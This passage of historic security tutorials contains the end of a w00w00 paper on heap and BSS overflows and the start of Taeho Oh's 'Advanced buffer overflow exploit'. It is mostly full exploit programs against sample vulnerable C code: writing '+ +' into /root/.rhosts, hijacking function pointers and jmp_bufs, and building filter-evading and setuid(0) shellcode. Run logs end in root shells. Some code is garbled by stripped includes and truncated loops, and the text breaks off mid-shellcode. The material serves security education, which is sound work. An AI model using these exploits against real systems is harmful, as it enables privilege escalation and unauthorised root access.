      gets(buf);

      printf("\nafter: tmpfile = %s\n", tmpfile);

      tmpfd = fopen(tmpfile, "w");
      if (tmpfd == NULL)
      {
         fprintf(stderr, "error opening %s: %s\n", tmpfile, 
                 strerror(errno));

         exit(ERROR);
      }

      fputs(buf, tmpfd);
      fclose(tmpfd);
   }

 -----------------------------------------------------------------------------

 The aim of this "example" program is to demonstrate that something of 
 this nature can easily occur in programs (although hopefully not setuid
 or root-owned daemon servers).

 And here is our exploit for the vulnerable program:
 -----------------------------------------------------------------------------
   /*
    * Copyright (C) January 1999, Matt Conover & WSD
    *
    * This will exploit vulprog1.c.  It passes some arguments to the
    * program (that the vulnerable program doesn't use).  The vulnerable
    * program expects us to enter one line of input to be stored
    * temporarily.  However, because of a static buffer overflow, we can
    * overwrite the temporary filename pointer, to have it point to
    * argv[1] (which we could pass as "/root/.rhosts").  Then it will
    * write our temporary line to this file.  So our overflow string (what
    * we pass as our input line) will be: 
    *   + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
    *
    * We use "+ +" (all hosts), followed by '#' (comment indicator), to
    * prevent our "attack code" from causing problems.  Without the 
    * "#", programs using .rhosts would misinterpret our attack code.
    *
    * Compile as: gcc -o exploit1 exploit1.c
    */

   #include 
   #include 
   #include 
   #include 

   #define BUFSIZE 256

   #define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */

   #define VULPROG "./vulprog1"
   #define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

   /* get value of sp off the stack (used to calculate argv[1] address) */
   u_long getesp()
   {
      __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
   }

   int main(int argc, char **argv)
   {
      u_long addr;

      register int i;
      int mainbufsize;

      char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";

      /* ------------------------------------------------------ */
      if (argc <= 1)
      {
         fprintf(stderr, "Usage: %s  [try 310-330]\n", argv[0]);
         exit(ERROR);
      }
      /* ------------------------------------------------------ */

      memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# ");

      memset(buf + strlen(buf), 'A', DIFF);
      addr = getesp() + atoi(argv[1]);

      /* reverse byte order (on a little endian system) */
      for (i = 0; i < sizeof(u_long); i++)
         buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);

      mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13;

      mainbuf = (char *)malloc(mainbufsize);
      memset(mainbuf, 0, sizeof(mainbuf));

      snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
               buf, VULPROG, VULFILE);

      printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
             addr, VULFILE);

      system(mainbuf);
      return 0;      
   }

 -----------------------------------------------------------------------------

 Here's what happens when we run it:
   [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320
   Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts after.

   before: tmpfile = /tmp/vulprog.tmp
   Enter one line of data to put in /tmp/vulprog.tmp:
   after: tmpfile = /vulprog1

 Well, we can see that's part of argv[0] ("./vulprog1"), so we know we are
 close:
   [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330
   Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after.

   before: tmpfile = /tmp/vulprog.tmp
   Enter one line of data to put in /tmp/vulprog.tmp:
   after: tmpfile = /root/.rhosts
   [root /tmp/heap/examples/advanced/vul-pkg1]#

 Got it!  The exploit overwrites the buffer that the vulnerable program
 uses for gets() input.  At the end of its buffer, it places the address
 of where we assume argv[1] of the vulnerable program is.  That is, we
 overwrite everything between the overflowed buffer and the tmpfile
 pointer.  We ascertained the tmpfile pointer's location in memory by
 sending arbitrary lengths of "A"'s until we discovered how many "A"'s it
 took to reach the start of tmpfile's address.  Also, if you have
 source to the vulnerable program, you can also add a "printf()" to print
 out the addresses/offsets between the overflowed data and the target data
 (i.e., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)').

 (Un)fortunately, the offsets usually change at compile-time (as far as
 I know), but we can easily recalculate, guess, or "brute force" the
 offsets.

 Note:
   Now that we need a valid address (argv[1]'s address), we must reverse
   the byte order for little endian systems.  Little endian systems use
   the least significant byte first (x86 is little endian) so that
   0x12345678 is 0x78563412 in memory.  If we were doing this on a big
   endian system (such as a sparc) we could drop out the code to reverse
   the byte order.  On a big endian system (like sparc), we could leave
   the addresses alone.

 Further note: 
   So far none of these examples required an executable heap! As I
   briefly mentioned in the "Why Heap/BSS Overflows are Significant"
   section, these (with the exception of the address byte order) previous
   examples were all system/architecture independent. This is useful in
   exploiting heap-based overflows.

 With knowledge of how to overwrite pointers, we're going to show how to
 modify function pointers.  The downside to exploiting function pointers
 (and the others to follow) is that they require an executable heap.

 A function pointer (i.e., "int (*funcptr)(char *str)") allows a
 programmer to dynamically modify a function to be called.  We can
 overwrite a function pointer by overwriting its address, so that when
 it's executed, it calls the function we point it to instead. This is
 good news because there are several options we have.  First, we
 can include our own shellcode. We can do one of the following with
 shellcode: 

   1. argv[] method: store the shellcode in an argument to the program
      (requiring an executable stack)

   2. heap offset method: offset from the top of the heap to the
      estimated address of the target/overflow buffer (requiring an
      executable heap)

 Note: There is a greater probability of the heap being executable than
 the stack on any given system.  Therefore, the heap method will probably
 work more often.

 A second method is to simply guess (though it's inefficient) the address
 of a function, using an estimated offset of that in the vulnerable
 program.  Also, if we know the address of system() in our program, it
 will be at a very close offset, assuming both vulprog/exploit were
 compiled the same way.  The advantage is that no executable is required.

 Note:
   Another method is to use the PLT (Procedure Linking Table) which shares
   the address of a function in the PLT.  I first learned the PLT method
   from str (stranJer) in a non-executable stack exploit for sparc.

 The reason the second method is the preferred method, is simplicity.
 We can guess the offset of system() in the vulprog from the address of
 system() in our exploit fairly quickly.  This is synonymous on remote
 systems (assuming similar versions, operating systems, and 
 architectures).  With the stack method, the advantage is that we can do
 whatever we want, and we don't require compatible function pointers
 (i.e., char (*funcptr)(int a) and void (*funcptr)() would work the same).
 The disadvantage (as mentioned earlier) is that it requires an
 executable stack.

 Here is our vulnerable program for the following 2 exploits:
 -----------------------------------------------------------------------------
   /* 
    * Just the vulnerable program we will exploit.
    * Compile as: gcc -o vulprog vulprog.c (or change exploit macros)
    */

   #include 
   #include 
   #include 
   #include 

   #define ERROR -1
   #define BUFSIZE 64

   int goodfunc(const char *str); /* funcptr starts out as this */

   int main(int argc, char **argv)
   {
      static char buf[BUFSIZE];
      static int (*funcptr)(const char *str);

      if (argc <= 2)
      {
         fprintf(stderr, "Usage: %s  \n", argv[0]);
         exit(ERROR);
      }

      printf("(for 1st exploit) system() = %p\n", system);
      printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]);
      printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf);

      funcptr = (int (*)(const char *str))goodfunc;
      printf("before overflow: funcptr points to %p\n", funcptr);

      memset(buf, 0, sizeof(buf));
      strncpy(buf, argv[1], strlen(argv[1]));
      printf("after overflow: funcptr points to %p\n", funcptr);

      (void)(*funcptr)(argv[2]);
      return 0;
   }

   /* ---------------------------------------------- */

   /* This is what funcptr would point to if we didn't overflow it */
   int goodfunc(const char *str)
   {
      printf("\nHi, I'm a good function.  I was passed: %s\n", str);
      return 0;
   }
 -----------------------------------------------------------------------------

 Our first example, is the system() method:
 -----------------------------------------------------------------------------
   /*
    * Copyright (C) January 1999, Matt Conover & WSD
    *
    * Demonstrates overflowing/manipulating static function pointers in
    * the bss (uninitialized data) to execute functions.
    *
    * Try in the offset (argv[2]) in the range of 0-20 (10-16 is best)
    * To compile use: gcc -o exploit1 exploit1.c
    */

   #include 
   #include 
   #include 
   #include 

   #define BUFSIZE 64 /* the estimated diff between funcptr/buf */

   #define VULPROG "./vulprog" /* vulnerable program location */
   #define CMD "/bin/sh" /* command to execute if successful */

   #define ERROR -1

   int main(int argc, char **argv)
   {
      register int i;
      u_long sysaddr;
      static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};

      if (argc <= 1)
      {
         fprintf(stderr, "Usage: %s \n", argv[0]);
         fprintf(stderr, "[offset = estimated system() offset]\n\n");

         exit(ERROR);
      }

      sysaddr = (u_long)&system - atoi(argv[1]);
      printf("trying system() at 0x%lx\n", sysaddr);

      memset(buf, 'A', BUFSIZE);

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(sysaddr); i++)
         buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

      execl(VULPROG, VULPROG, buf, CMD, NULL);
      return 0;
   }
 -----------------------------------------------------------------------------

 When we run this with an offset of 16 (which may vary) we get:
   [root /w00w00/heap/examples]# ./exploit1 16
   trying system() at 0x80484d0
   (for 1st exploit) system() = 0x80484d0
   (for 2nd exploit, stack method) argv[2] = 0xbffffd3c
   (for 2nd exploit, heap offset method) buf = 0x804a9a8

   before overflow: funcptr points to 0x8048770
   after overflow: funcptr points to 0x80484d0
   bash#

 And our second example, using both argv[] and heap offset method:
 -----------------------------------------------------------------------------
   /*
    * Copyright (C) January 1999, Matt Conover & WSD
    *
    * This demonstrates how to exploit a static buffer to point the
    * function pointer at argv[] to execute shellcode.  This requires
    * an executable heap to succeed.
    *
    * The exploit takes two argumenst (the offset and "heap"/"stack").  
    * For argv[] method, it's an estimated offset to argv[2] from 
    * the stack top.  For the heap offset method, it's an estimated offset
    * to the target/overflow buffer from the heap top.
    *
    * Try values somewhere between 325-345 for argv[] method, and 420-450
    * for heap.
    *
    * To compile use: gcc -o exploit2 exploit2.c
    */

   #include 
   #include 
   #include 
   #include 

   #define ERROR -1
   #define BUFSIZE 64 /* estimated diff between buf/funcptr */

   #define VULPROG "./vulprog" /* where the vulprog is */

   char shellcode[] = /* just aleph1's old shellcode (linux x86) */
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
     "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
     "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

   u_long getesp()
   {
      __asm__("movl %esp,%eax"); /* set sp as return value */
   }

   int main(int argc, char **argv)
   {
      register int i;
      u_long sysaddr;
      char buf[BUFSIZE + sizeof(u_long) + 1];

      if (argc <= 2)
      {
         fprintf(stderr, "Usage: %s  \n", argv[0]);
         exit(ERROR);
      }

      if (strncmp(argv[2], "stack", 5) == 0)
      {
         printf("Using stack for shellcode (requires exec. stack)\n");

         sysaddr = getesp() + atoi(argv[1]);
         printf("Using 0x%lx as our argv[1] address\n\n", sysaddr);

         memset(buf, 'A', BUFSIZE + sizeof(u_long));
      }

      else
      {
         printf("Using heap buffer for shellcode "
                "(requires exec. heap)\n");

         sysaddr = (u_long)sbrk(0) - atoi(argv[1]);
         printf("Using 0x%lx as our buffer's address\n\n", sysaddr);

         if (BUFSIZE + 4 + 1 < strlen(shellcode))
         {
            fprintf(stderr, "error: buffer is too small for shellcode "
                            "(min. = %d bytes)\n", strlen(shellcode));

            exit(ERROR);
         }

         strcpy(buf, shellcode);
         memset(buf + strlen(shellcode), 'A',
                BUFSIZE - strlen(shellcode) + sizeof(u_long));
      }

      buf[BUFSIZE + sizeof(u_long)] = '\0';

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(sysaddr); i++)
         buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

      execl(VULPROG, VULPROG, buf, shellcode, NULL);
      return 0;
   }
 -----------------------------------------------------------------------------

 When we run this with an offset of 334 for the argv[] method we get:
   [root /w00w00/heap/examples] ./exploit2 334 stack
   Using stack for shellcode (requires exec. stack)
   Using 0xbffffd16 as our argv[1] address

   (for 1st exploit) system() = 0x80484d0
   (for 2nd exploit, stack method) argv[2] = 0xbffffd16
   (for 2nd exploit, heap offset method) buf = 0x804a9a8

   before overflow: funcptr points to 0x8048770
   after overflow: funcptr points to 0xbffffd16
   bash#

 When we run this with an offset of 428-442 for the heap offset method we get:
   [root /w00w00/heap/examples] ./exploit2 428 heap
   Using heap buffer for shellcode (requires exec. heap)
   Using 0x804a9a8 as our buffer's address

   (for 1st exploit) system() = 0x80484d0
   (for 2nd exploit, stack method) argv[2] = 0xbffffd16
   (for 2nd exploit, heap offset method) buf = 0x804a9a8

   before overflow: funcptr points to 0x8048770
   after overflow: funcptr points to 0x804a9a8
   bash#

 Note: 
   Another advantage to the heap method is that you have a large
   working range. With argv[] (stack) method, it needed to be exact.  With
   the heap offset method, any offset between 428-442 worked.

 As you can see, there are several different methods to exploit the same
 problem.  As an added bonus, we'll include a final type of exploitation
 that uses jmp_bufs (setjmp/longjmp).  jmp_buf's basically store a stack
 frame, and jump to it at a later point in execution.  If we get a chance
 to overflow a buffer between setjmp() and longjmp(), that's above the
 overflowed buffer, this can be exploited.  We can set these up to emulate
 the behavior of a stack-based overflow (as does the argv[] shellcode
 method used earlier, also).  Now this is the jmp_buf for an x86 system.
 These will needed to be modified for other architectures, accordingly.

 First we will include a vulnerable program again:
 -----------------------------------------------------------------------------
   /*
    * This is just a basic vulnerable program to demonstrate
    * how to overwrite/modify jmp_buf's to modify the course of
    * execution.
    */

   #include 
   #include 
   #include 
   #include 
   #include 

   #define ERROR -1
   #define BUFSIZE 16

   static char buf[BUFSIZE];
   jmp_buf jmpbuf;

   u_long getesp()
   {
   __asm__("movl %esp,%eax"); /* the return value goes in %eax */
   }

   int main(int argc, char **argv)
   {
      if (argc <= 1)
      {
         fprintf(stderr, "Usage: %s  \n");
         exit(ERROR);
      }

      printf("[vulprog] argv[2] = %p\n", argv[2]);
      printf("[vulprog] sp = 0x%lx\n\n", getesp());

      if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */
      {
         fprintf(stderr, "error: exploit didn't work\n");
         exit(ERROR);
      }

      printf("before:\n");
      printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
             jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

      printf("bp = %p, sp = %p, pc = %p\n\n",
             jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

      strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */

      printf("after:\n");
      printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
             jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

      printf("bp = %p, sp = %p, pc = %p\n\n",
             jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

      longjmp(jmpbuf, 1);
      return 0;
   }
 -----------------------------------------------------------------------------

 The reason we have the vulnerable program output its stack pointer (esp
 on x86) is that it makes "guessing" easier for the novice.

 And now the exploit for it (you should be able to follow it):
 -----------------------------------------------------------------------------
   /*
    * Copyright (C) January 1999, Matt Conover & WSD
    *
    * Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp)
    * to emulate a stack-based overflow in the heap.  By that I mean,
    * you would overflow the sp/pc of the jmpbuf.  When longjmp() is
    * called, it will execute the next instruction at that address.
    * Therefore, we can stick shellcode at this address (as the data/heap
    * section on most systems is executable), and it will be executed.
    *
    * This takes two arguments (offsets):
    *   arg 1 - stack offset (should be about 25-45).
    *   arg 2 - argv offset (should be about 310-330).
    */

   #include 
   #include 
   #include 
   #include 

   #define ERROR -1
   #define BUFSIZE 16

   #define VULPROG "./vulprog4"

   char shellcode[] = /* just aleph1's old shellcode (linux x86) */
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
      "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
      "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

   u_long getesp()
   {
      __asm__("movl %esp,%eax"); /* the return value goes in %eax */
   }

   int main(int argc, char **argv)
   {
      int stackaddr, argvaddr;
      register int index, i, j;

      char buf[BUFSIZE + 24 + 1];

      if (argc <= 1)
      {
         fprintf(stderr, "Usage: %s  \n",
                 argv[0]);

         fprintf(stderr, "[stack offset = offset to stack of vulprog\n");
         fprintf(stderr, "[argv offset = offset to argv[2]]\n");

         exit(ERROR);
      }

      stackaddr = getesp() - atoi(argv[1]);
      argvaddr = getesp() + atoi(argv[2]);

      printf("trying address 0x%lx for argv[2]\n", argvaddr);
      printf("trying address 0x%lx for sp\n\n", stackaddr);

      /*
       * The second memset() is needed, because otherwise some values
       * will be (null) and the longjmp() won't do our shellcode.
       */

      memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12);
      buf[BUFSIZE+24] = '\0';

      /* ------------------------------------- */

      /*
       * We need the stack pointer, because to set pc to our shellcode
       * address, we have to overwrite the stack pointer for jmpbuf.
       * Therefore, we'll rewrite it with the real address again.
       */

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(u_long); i++) /* setup BP */
      {
         index = BUFSIZE + 16 + i;
         buf[index] = (stackaddr >> (i * 8)) & 255;
      }

      /* ----------------------------- */

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(u_long); i++) /* setup SP */
      {
         index = BUFSIZE + 20 + i;
         buf[index] = (stackaddr >> (i * 8)) & 255;
      }

      /* ----------------------------- */

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(u_long); i++) /* setup PC */
      {
         index = BUFSIZE + 24 + i;
         buf[index] = (argvaddr >> (i * 8)) & 255;
      }

      execl(VULPROG, VULPROG, buf, shellcode, NULL);
      return 0;
   }
 -----------------------------------------------------------------------------

 Ouch, that was sloppy.  But anyway, when we run this with a stack offset
 of 36 and a argv[2] offset of 322, we get the following:
   [root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322
   trying address 0xbffffcf6 for argv[2]
   trying address 0xbffffb90 for sp

   [vulprog] argv[2] = 0xbffffcf6
   [vulprog] sp = 0xbffffb90

   before:
   bx = 0x0, si = 0x40001fb0, di = 0x4000000f
   bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715

   after:
   bx = 0x1010101, si = 0x1010101, di = 0x1010101
   bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6

   bash#

 w00w00!  For those of you that are saying, "Okay.  I see this works in a
 controlled environment; but what about in the wild?"  There is sensitive
 data on the heap that can be overflowed.  Examples include:
      functions                       reason
   1. *gets()/*printf(), *scanf()     __iob (FILE) structure in heap
   2. popen()                         __iob (FILE) structure in heap
   3. *dir() (readdir, seekdir, ...)  DIR entries (dir/heap buffers)
   4. atexit()                        static/global function pointers
   5. strdup()                        allocates dynamic data in the heap
   7. getenv()                        stored data on heap
   8. tmpnam()                        stored data on heap
   9. malloc()                        chain pointers
   10. rpc callback functions         function pointers
   11. windows callback functions     func pointers kept on heap
   12. signal handler pointers        function pointers (note: unix tracks
       in cygnus (gcc for win),       these in the kernel, not in the heap)

 Now, you can definitely see some uses these functions.  Room allocated
 for FILE structures in functions such as printf()'s, fget()'s,
 readdir()'s, seekdir()'s, etc. can be manipulated (buffer or function
 pointers).  atexit() has function pointers that will be called when the
 program terminates.  strdup() can store strings (such as filenames or
 passwords) on the heap.  malloc()'s own chain pointers (inside its pool)
 can be manipulated to access memory it wasn't meant to be.  getenv()
 stores data on the heap, which would allow us modify something such as
 $HOME after it's initially checked.  svc/rpc registration functions  
 (librpc, libnsl, etc.) keep callback functions stored on the heap.

 We will demonstrate overwriting Windows callback functions and 
 overwriting FILE (__iob) structures (with popen).

 Once you know how to overwrite FILE sturctures with popen(), you can
 quickly figure out how to do it with other functions (i.e., *printf,
 *gets, *scanf, etc.), as well as DIR structures (because they are
 similar.

 Now for some case studies!  Our two "real world" vulnerabilities will be
 Solaris' tip and BSDI's crontab.  The BSDI crontab vulnerability
 was discovered by mudge of L0pht (see L0pht 1996 Advisory Page).  We're
 reusing it because it's a textbook example of a heap-based overflow
 (though we will use our own method of exploitation).

 Our first case study will be the BSDI crontab heap-based overflow.  We
 can pass a long filename, which will overflow a static buffer.  Above
 that buffer in memory, we have a pwd (see pwd.h) structure!  This stores
 a user's user name, password, uid, gid, etc.  By overwriting the uid/gid
 field of the pwd, we can modify the privileges that crond will run our
 crontab with (as soon as it tries to run our crontab).  This script could
 then put out a suid root shell, because our script will be running with
 uid/gid 0.

 Here is our exploit code:
 -----------------------------------------------------------------------------
 -----------------------------------------------------------------------------

 When we run it on a BSDI X.X machine, we get the following:
   [Put exploit output here]

 'tip' is run suid uucp on Solaris. It is possible to get root once uucp 
 privileges are gained (but, that's outside the scope of this article).
 Tip will overflow a static buffer when prompting for a file to 
 send/receive.  Above the static buffer in memory is a jmp_buf.  By
 overwriting the static buffer and then causing a SIGINT, we can get
 shellcode executed (by storing it in argv[]).  To exploit successfully,
 we need to either connect to a valid system, or create a "fake device" 
 with which tip will connect to.

 Here is our tip exploit:
 -----------------------------------------------------------------------------
 -----------------------------------------------------------------------------

 When we run it on a Solaris 2.7 machine, we get the following:
   [Put exploit output here]

Possible Fixes (Workarounds)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Obviously, the best prevention for heap-based overflows is writing good
 code!  Similar to stack-based overflows, there is no real way of
 preventing heap-based overflows. 

 We can get a copy of the bounds checking gcc/egcs (which should locate
 most potential heap-based overflows) developed by Richard Jones and Paul
 Kelly.  This program can be downloaded from Richard Jone's homepage 
 at http://www.annexia.demon.co.uk.  It detects overruns that might be
 missed by human error.  One example they use is: "int array[10]; for (i =
 0; i <= 10; i++) array[i] = 1".  I have never used it.

 Note:
   For Windows, one could use NuMega's bounds checker which essentially
   performs the same as the bounds checking gcc.

 We can always make a non-executable heap patch (as mentioned early, most
 systems have an executable heap).  During a conversation I had with Solar
 Designer, he mentioned the main problems with a non-executable would
 involve compilers, interpreters, etc.

 Note:
   I added a note section here to reiterate the point a non-executable
   heap does NOT prevent heap overflows at all.  It means we can't execute
   instructions in the heap.  It does NOT prevent us from overwriting data
   in the heap.

 Likewise, another possibility is to make a "HeapGuard", which would be
 the equivalent to Cowan's StackGuard mentioned earlier.  He (et. al.) 
 also developed something called "MemGuard", but it's a misnomer.
 Its function is to prevent a return address (on the stack) from being
 overwritten (via canary values) on the stack.  It does nothing to prevent
 overflows in the heap or bss.


Acknowledgements
~~~~~~~~~~~~~~~~
 There has been a significant amount of work on heap-based overflows in
 the past.  We ought to name some other people who have published work
 involving heap/bss-based overflows (though, our work wasn't based off
 them).

 Solar Designer: SuperProbe exploit (function pointers), color_xterm
 exploit (struct pointers), WebSite (pointer arrays), etc.
  
 L0pht: Internet Explorer 4.01 vulnerablity (dildog), BSDI crontab
 exploit (mudge), etc. 

 Some others who have published exploits for heap-based overflows (thanks
 to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and Adam
 Morrison (stdioflow).  I'm sure there are many others, and I apologize for
 excluding anyone.

 I'd also like to thank the following people who had some direct
 involvement in this article: str (stranJer), halflife, and jobe.
 Indirect involvements: Solar Designer, mudge, and other w00w00
 affiliates.

 Other good sources of info include: as/gcc/ld info files (/usr/info/*),
 BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00 
 (http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc.

Epilogue:
  Most people who claim their systems are "secure" are saying so out of
  a lack of knowledge (ignorant seemed a little too strong).  Assuming
  security leads to a false sense of security (e.g., azrael.phrack.com,
  has remote vulnerabilities involving heap-based overflows that have gone
  unnoticed for quite a while).  Hopefully, people will experiment with
  heap-based overflows, and in turn, will become more aware that the
  problems exist.  We need to realize that the problems are out there,
  waiting to be fixed.

Thanks for reading!  We hope you've enjoyed it!  You can e-mail me at
shok@dataforce.net, or mattc@repsec.com.  See the w00w00 (www.w00w00.org)
web site, also!

------------------------------------------------------------------------------
Matt Conover (a.k.a. Shok) & w00w00 Security Team

[ http://www.w00w00.org, w00w00 Security Development (WSD)  ]
[ See the URL above for information on: what w00w00 is, our ]
[ security projects (all available online), some of our     ]
[ articles, and more.  Enjoy! ]
 

Article 4

Advanced buffer overflow exploit


 Written by Taeho Oh ( ohhara@postech.edu )
----------------------------------------------------------------------------
Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
----------------------------------------------------------------------------


1. Introduction
 Nowadays there are many buffer overflow exploit codes. The early buffer
overflow exploit codes only spawn a shell ( execute /bin/sh ). However,
nowadays some of the buffer overflow exploit codes have very nice features.
For example, passing through filtering, opening a socket, breaking chroot,
and so on. This paper will attempt to explain the advanced buffer overflow
exploit skill under intel x86 linux.

2. What do you have to know before reading?
 You have to know assembly language, C language, and Linux. Of course, you
have to know what buffer overflow is. You can get the information of the
buffer overflow in phrack 49-14 ( Smashing The Stack For Fun And Profit
by Aleph1 ). It is a wonderful paper of buffer overflow and I highly recommend
you to read that before reading this one.

3. Pass through filtering
 There are many programs which has buffer overflow problems. Why are not the
all buffer overflow problems exploited? Because even if a program has a buffer
overflow condition, it can be hard to exploit. In many cases, the reason is
that the program filters some characters or converts characters into other
characters. If the program filters all non printable characters, it's too
hard to exploit. If the program filters some of characters, you can pass
through the filter by making good buffer overflow exploit code. :)

3.1 The example vulnerable program

vulnerable1.c
----------------------------------------------------------------------------
#include
#include

int main(int argc,int **argv)
{
	char buffer[1024];
	int i;
	if(argc>1)
	{
		for(i=0;i
#include

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[]=
	"\xeb\x38"                      /* jmp 0x38              */
	"\x5e"                          /* popl %esi             */
	"\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi)  */
	"\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi)  */
	"\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi)  */
	"\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi)  */
	"\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi)  */
	"\x89\xf0"                      /* movl %esi,%eax        */
	"\x83\xc0\x08"                  /* addl $0x8,%eax        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xd8"                      /* movl %ebx,%eax        */
	"\x40"                          /* inc %eax              */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xc3\xff\xff\xff"          /* call -0x3d            */
	"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"     */
	                                /* /bin/sh is disguised  */

unsigned long get_sp(void)
{
	__asm__("movl %esp,%eax");
}

main(int argc,char **argv)
{
	char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
	long addr;
	unsigned long sp;
	int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
	int i;

	if(argc>1)
		offset=atoi(argv[1]);

	sp=get_sp();
	addr=sp-offset;

	for(i=0;i>8;
		buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
		buff[i+ALIGN+3]=(addr&0xff000000)>>24;
	}

	for(i=0;i
#include

int main(int argc,char **argv)
{
	char buffer[1024];
	seteuid(getuid());
	if(argc>1)
		strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------

 This vulnerable program calls seteuid(getuid()) at start. Therefore, you
may think that "strcpy(buffer,argv[1]);" is OK. Because you can only get
your own shell although you succeed in buffer overflow attack. However,
if you insert a code which calls setuid(0) in the shellcode, you can get
root shell. :)

4.2 Make setuid(0) code

setuidasm.c
----------------------------------------------------------------------------
main()
{
	setuid(0);
}
----------------------------------------------------------------------------

compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c
[ ohhara@ohhara ~ ] {2} $ gdb setuidasm
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble setuid
Dump of assembler code for function __setuid:
0x804ca00 <__setuid>:   movl   %ebx,%edx
0x804ca02 <__setuid+2>: movl   0x4(%esp,1),%ebx
0x804ca06 <__setuid+6>: movl   $0x17,%eax
0x804ca0b <__setuid+11>:        int    $0x80
0x804ca0d <__setuid+13>:        movl   %edx,%ebx
0x804ca0f <__setuid+15>:        cmpl   $0xfffff001,%eax
0x804ca14 <__setuid+20>:        jae    0x804cc10 <__syscall_error>
0x804ca1a <__setuid+26>:        ret    
0x804ca1b <__setuid+27>:        nop    
0x804ca1c <__setuid+28>:        nop    
0x804ca1d <__setuid+29>:        nop    
0x804ca1e <__setuid+30>:        nop    
0x804ca1f <__setuid+31>:        nop    
End of assembler dump.
(gdb)
----------------------------------------------------------------------------

setuid(0); code
----------------------------------------------------------------------------
char code[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xb0\x17"                      /* movb $0x17,%al        */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

4.3 Modify the normal shellcode

 Making new shellcode is very easy if you make setuid(0) code. Just insert
the code into the start of the normal shellcode.

new shellcode
----------------------------------------------------------------------------
char shellcode[]=
